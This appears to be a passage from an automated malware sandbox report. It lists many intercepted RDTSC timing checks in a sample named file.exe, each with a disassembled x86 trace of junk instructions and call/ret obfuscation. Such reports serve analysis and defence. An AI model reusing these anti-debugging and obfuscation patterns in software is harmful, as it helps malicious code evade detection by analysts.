0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push 00000000h 0x0000004c mov ebx, dword ptr [ebp+122D1819h] 0x00000052 push eax 0x00000053 pushad 0x00000054 jmp 00007F11A11FDA72h 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08426 second address: D084DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jo 00007F11A0E03016h 0x00000013 pop ecx 0x00000014 jmp 00007F11A0E03029h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F11A0E03018h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 push dword ptr fs:[00000000h] 0x0000003c js 00007F11A0E0301Ch 0x00000042 mov dword ptr [ebp+122D1BBDh], esi 0x00000048 jmp 00007F11A0E03028h 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov ebx, dword ptr [ebp+122D3691h] 0x0000005a sub dword ptr [ebp+122D240Ah], edx 0x00000060 mov eax, dword ptr [ebp+122D0D5Dh] 0x00000066 push eax 0x00000067 mov dword ptr [ebp+122D1F50h], ecx 0x0000006d pop edi 0x0000006e push FFFFFFFFh 0x00000070 ja 00007F11A0E03022h 0x00000076 nop 0x00000077 jl 00007F11A0E0301Eh 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C43A second address: D0C43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C43E second address: D0C44B instructions: 0x00000000 rdtsc 0x00000002 je 00007F11A0E03016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C4D5 second address: D0C4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B601 second address: D0B61C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0E03027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B61C second address: D0B621 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E372 second address: D0E378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C6D4 second address: D0C6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C6D8 second address: D0C6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10431 second address: D1043B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A11FDA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1241E second address: D12445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F11A0E03034h 0x0000000e pushad 0x0000000f jmp 00007F11A0E03026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D143AE second address: D14450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A11FDA6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F11A11FDA6Ch 0x00000011 pop edi 0x00000012 ja 00007F11A11FDA76h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F11A11FDA68h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 and ebx, dword ptr [ebp+122D35F1h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F11A11FDA68h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 jnl 00007F11A11FDA6Ch 0x0000005e mov di, ax 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 jnc 00007F11A11FDA66h 0x0000006b pop ecx 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12673 second address: D12678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12678 second address: D1267F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16968 second address: D169B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D1842h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F11A0E03018h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b and edi, 69666EA5h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 jbe 00007F11A0E03018h 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1362E second address: D13634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1267F second address: D1270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a js 00007F11A0E03016h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F11A0E03022h 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e mov di, 804Ah 0x00000022 push dword ptr fs:[00000000h] 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F11A0E03018h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a jmp 00007F11A0E0301Ah 0x0000004f mov bh, 4Ah 0x00000051 mov eax, dword ptr [ebp+122D1495h] 0x00000057 mov ebx, dword ptr [ebp+122D2A53h] 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007F11A0E0301Eh 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13634 second address: D13655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F11A12050B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1270E second address: D12714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B1E second address: D16B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B24 second address: D16B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B28 second address: D16B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edi, dword ptr [ebp+122D38F9h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f add dword ptr [ebp+122D1AC1h], esi 0x00000025 call 00007F11A12050C1h 0x0000002a pop ebx 0x0000002b mov eax, dword ptr [ebp+122D0FA1h] 0x00000031 mov edi, dword ptr [ebp+122D2439h] 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F11A12050B8h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov di, 930Fh 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B98 second address: D16BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A1057FABh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16BA8 second address: D16BCC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11A12050B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F11A12050C5h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16BCC second address: D16BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20E49 second address: D20E54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20E54 second address: D20E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20E5E second address: D20E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F11A12050C9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F11A12050B6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20631 second address: D20637 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20637 second address: D2064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jo 00007F11A12050B6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2064E second address: D20668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A1057FB3h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D207CC second address: D207D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D207D2 second address: D207E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jnl 00007F11A1057FA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2524A second address: D2526F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007F11A12050BAh 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d jc 00007F11A12050BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D254D7 second address: B4FA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 561F878Fh 0x0000000c stc 0x0000000d push dword ptr [ebp+122D1019h] 0x00000013 jnc 00007F11A1057FADh 0x00000019 jp 00007F11A1057FA7h 0x0000001f ja 00007F11A1057FAEh 0x00000025 jne 00007F11A1057FA8h 0x0000002b call dword ptr [ebp+122D23ABh] 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D2452h], edi 0x00000038 xor eax, eax 0x0000003a clc 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f mov dword ptr [ebp+122D2452h], ecx 0x00000045 mov dword ptr [ebp+122D395Dh], eax 0x0000004b sub dword ptr [ebp+122D1838h], esi 0x00000051 mov dword ptr [ebp+122D1838h], ebx 0x00000057 mov esi, 0000003Ch 0x0000005c pushad 0x0000005d add dword ptr [ebp+122D1838h], esi 0x00000063 popad 0x00000064 xor dword ptr [ebp+122D2452h], edi 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e pushad 0x0000006f adc di, 8B14h 0x00000074 or bh, 00000017h 0x00000077 popad 0x00000078 mov dword ptr [ebp+122D1838h], ecx 0x0000007e lodsw 0x00000080 add dword ptr [ebp+122D1838h], edi 0x00000086 clc 0x00000087 add eax, dword ptr [esp+24h] 0x0000008b pushad 0x0000008c mov esi, dword ptr [ebp+122D374Dh] 0x00000092 mov dword ptr [ebp+122D19F6h], eax 0x00000098 popad 0x00000099 mov ebx, dword ptr [esp+24h] 0x0000009d jmp 00007F11A1057FB5h 0x000000a2 push eax 0x000000a3 push eax 0x000000a4 push edx 0x000000a5 jnc 00007F11A1057FA8h 0x000000ab rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3561 second address: CC3565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3565 second address: CC358E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F11A1057FB4h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC358E second address: CC3593 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3593 second address: CC3599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A105 second address: D2A127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F11A12050BFh 0x0000000d popad 0x0000000e jo 00007F11A12050BEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A6DC second address: D2A6E8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F11A1057FAEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A6E8 second address: D2A6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F11A12050B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A834 second address: D2A839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A839 second address: D2A875 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C4h 0x00000007 push ebx 0x00000008 jmp 00007F11A12050C6h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F11A12050B6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A875 second address: D2A87D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A87D second address: D2A882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AC7F second address: D2AC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF61 second address: D2AF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF67 second address: D2AF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AF6B second address: D2AFBC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A12050B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F11A12050BEh 0x00000010 jc 00007F11A12050B6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d jmp 00007F11A12050BAh 0x00000022 jmp 00007F11A12050BAh 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a jns 00007F11A12050BCh 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F11A12050BFh 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2AFBC second address: D2AFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B116 second address: D2B11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B29A second address: D2B2BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A1057FA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jnc 00007F11A1057FA6h 0x00000013 jmp 00007F11A1057FACh 0x00000018 pop ebx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2EE8B second address: D2EE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30622 second address: D30626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D30626 second address: D3062C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9862 second address: CF9870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A1057FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9BF2 second address: CF9BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9E35 second address: CF9E5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A1057FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b xchg eax, esi 0x0000000c mov dword ptr [ebp+122D27B6h], ecx 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F11A1057FB5h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA08F second address: CFA094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA179 second address: CFA17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA17D second address: CFA219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F11A12050BBh 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F11A12050B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F11A12050C9h 0x00000030 mov dword ptr [ebp+122D19F6h], edi 0x00000036 pop edx 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F11A12050B8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 nop 0x00000054 jng 00007F11A12050D4h 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F11A12050C6h 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA634 second address: CFA638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA638 second address: CFA64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jo 00007F11A12050B6h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA64A second address: CFA695 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11A1057FA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movzx ecx, di 0x0000000e push 0000001Eh 0x00000010 jng 00007F11A1057FABh 0x00000016 call 00007F11A1057FB8h 0x0000001b sbb dx, A4DDh 0x00000020 pop ecx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F11A1057FADh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA695 second address: CFA6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F11A12050BCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA9DC second address: CFA9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAAF1 second address: CE1FB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c jmp 00007F11A12050C7h 0x00000011 pop esi 0x00000012 nop 0x00000013 cmc 0x00000014 call dword ptr [ebp+122D28D3h] 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1FB9 second address: CE1FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34226 second address: D34247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F11A12050C3h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34247 second address: D34253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D34384 second address: D343A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A12050C6h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3455F second address: D34570 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F11A1057FACh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
